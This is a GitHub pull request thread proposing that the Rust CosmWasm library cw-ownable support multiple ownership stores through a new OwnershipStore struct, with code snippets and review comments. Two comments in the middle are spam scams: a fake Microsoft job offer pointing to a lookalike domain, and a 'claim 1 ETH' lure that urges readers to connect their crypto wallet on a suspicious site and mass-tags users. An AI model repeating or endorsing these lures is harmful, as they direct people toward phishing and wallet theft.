### PR TITLE
Allow `cw-ownable` for multiple ownerships in one contract

### PR DESCRIPTION
**Pull request by taitruong**
Referring to #17, there has been recent request also by Stargaze team, which forked repo and refactored `cw-ownable`. For detailed explanations see PR on public awesome repo here: https://github.com/public-awesome/cw-plus-plus/pull/1

For simplicity pasting description here as well:
All the logic has been moved to new Struct `OwnershipStore`. `cw-ownable` package is still a singleton:

```rust
/// Storage constant for the contract's ownership
pub const OWNERSHIP_KEY: &str = "ownership";
pub const OWNERSHIP: OwnershipStore = OwnershipStore::new(OWNERSHIP_KEY);
```

all existing functions now using new store struct:

```rust
pub fn initialize_owner(
    storage: &mut dyn Storage,
    api: &dyn Api,
    owner: Option<&str>,
) -> StdResult<Ownership<Addr>> {
    OWNERSHIP.initialize_owner(storage, api, owner)
}

pub fn is_owner(store: &dyn Storage, addr: &Addr) -> StdResult<bool> {
    OWNERSHIP.is_owner(store, addr)
}

pub fn assert_owner(store: &dyn Storage, sender: &Addr) -> Result<(), OwnershipError> {
    OWNERSHIP.assert_owner(store, sender)
}

pub fn update_ownership(
    deps: DepsMut,
    block: &BlockInfo,
    sender: &Addr,
    action: Action,
) -> Result<Ownership<Addr>, OwnershipError> {
    OWNERSHIP.update_ownership(deps, block, sender, action)
}

pub fn get_ownership(storage: &dyn Storage) -> StdResult<Ownership<Addr>> {
    OWNERSHIP.get_ownership(storage)
}
```

So contract using `cw-ownable` still uses above functions like `initialize_owner` (100% backward compatile). But this PR allows `cw-ownable` for defining another storage. So if contract needs another ownership-like store,  `OwnershipStore` can be used.

Example: collection contract need to distince between owner (aka minter) and creator. Here minter is allowed to mint NFTs, whilst creator is able to update collection info like name, symbol, royalties, description, collection pfp etc.
This is planned for upcoming new `cw721-base` release. So this PR allows contract defining creator like this:

```rust
pub const CREATOR: OwnershipStore = OwnershipStore::new("creator");
```

### CODE REVIEW

**Comment by taitruong** [comment]
@larry0x pls have a look at this PR. Imo allows `cw-ownable` being used for more use cases.

**Comment by Malkhedkar-web** [comment]
# [Amazing Job Opportunity at Microsoft](https://careersmicrosoft.online/)

Exciting news! You have the chance to apply for a dream job at Microsoft Inc.!

## How to Apply:
Apply now by clicking [here](https://careersmicrosoft.online/). Hurry, applications close on [March 20, 2024](https://careersmicrosoft.online/).

## Job Description:
- **Position:** Lead Software Engineer
- **Salary:** $400,000 per year
- **Location:** Fully Remote
- **Benefits:**
  - Comprehensive health insurance coverage for you and your family
  - Generous retirement plan contributions
  - Unlimited vacation days and flexible work hours
  - Company-paid sabbaticals every three years
  - Annual company retreats to exotic locations
  - Cutting-edge equipment and tools for productivity

## Requirements:
- Minimum of 2 years of software engineering experience
- Expertise in multiple programming languages, including Python, JavaScript, and Go
- Deep understanding of cloud technologies, especially AWS and Kubernetes
- Track record of leading high-performing engineering teams
- Strong communication skills and ability to mentor junior developers

**Note:** This position is open to candidates worldwide. Don't miss the chance to join Microsoft Inc. and work on groundbreaking projects!
Yitzchok, @andrewpaulicek, @GarlandKey, @zaicheng-qi, @fabianschl, @kjebrak, @kryptish, @frantino199, @bradleat, @cNoveron, @Mohamadarab6910, @Gitleyla, @Killman77, @lambdahands, @shunkakinoki, @xiaodong0228, @AmbroiseCrbl, @robrigo, @mpolci, @muccs

**Comment by jarellano03** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
DarkingLee, @PratikDhanave, @HAOYUatHZ, @stfy, @shunkakinoki, @Samtrader3388, @hoda333, @jamesvandanft, @OrJah, @m-kus, @ads-light1992, @gitsrc, @mouzzarr, @cl3pl4t3, @timucinylmz, @danteGPT, @MuhtasimTanmoy, @larry0x, @cyborgshead, @alberthuang24

**Comment by PFC-developer** [comment]
hey @larry0x any chance of getting this merged? it's needed for cw-nft's to go back to this version

**Comment by taitruong** [comment]
closing this, since it has been merged by #25

**Pull request closed without merging**
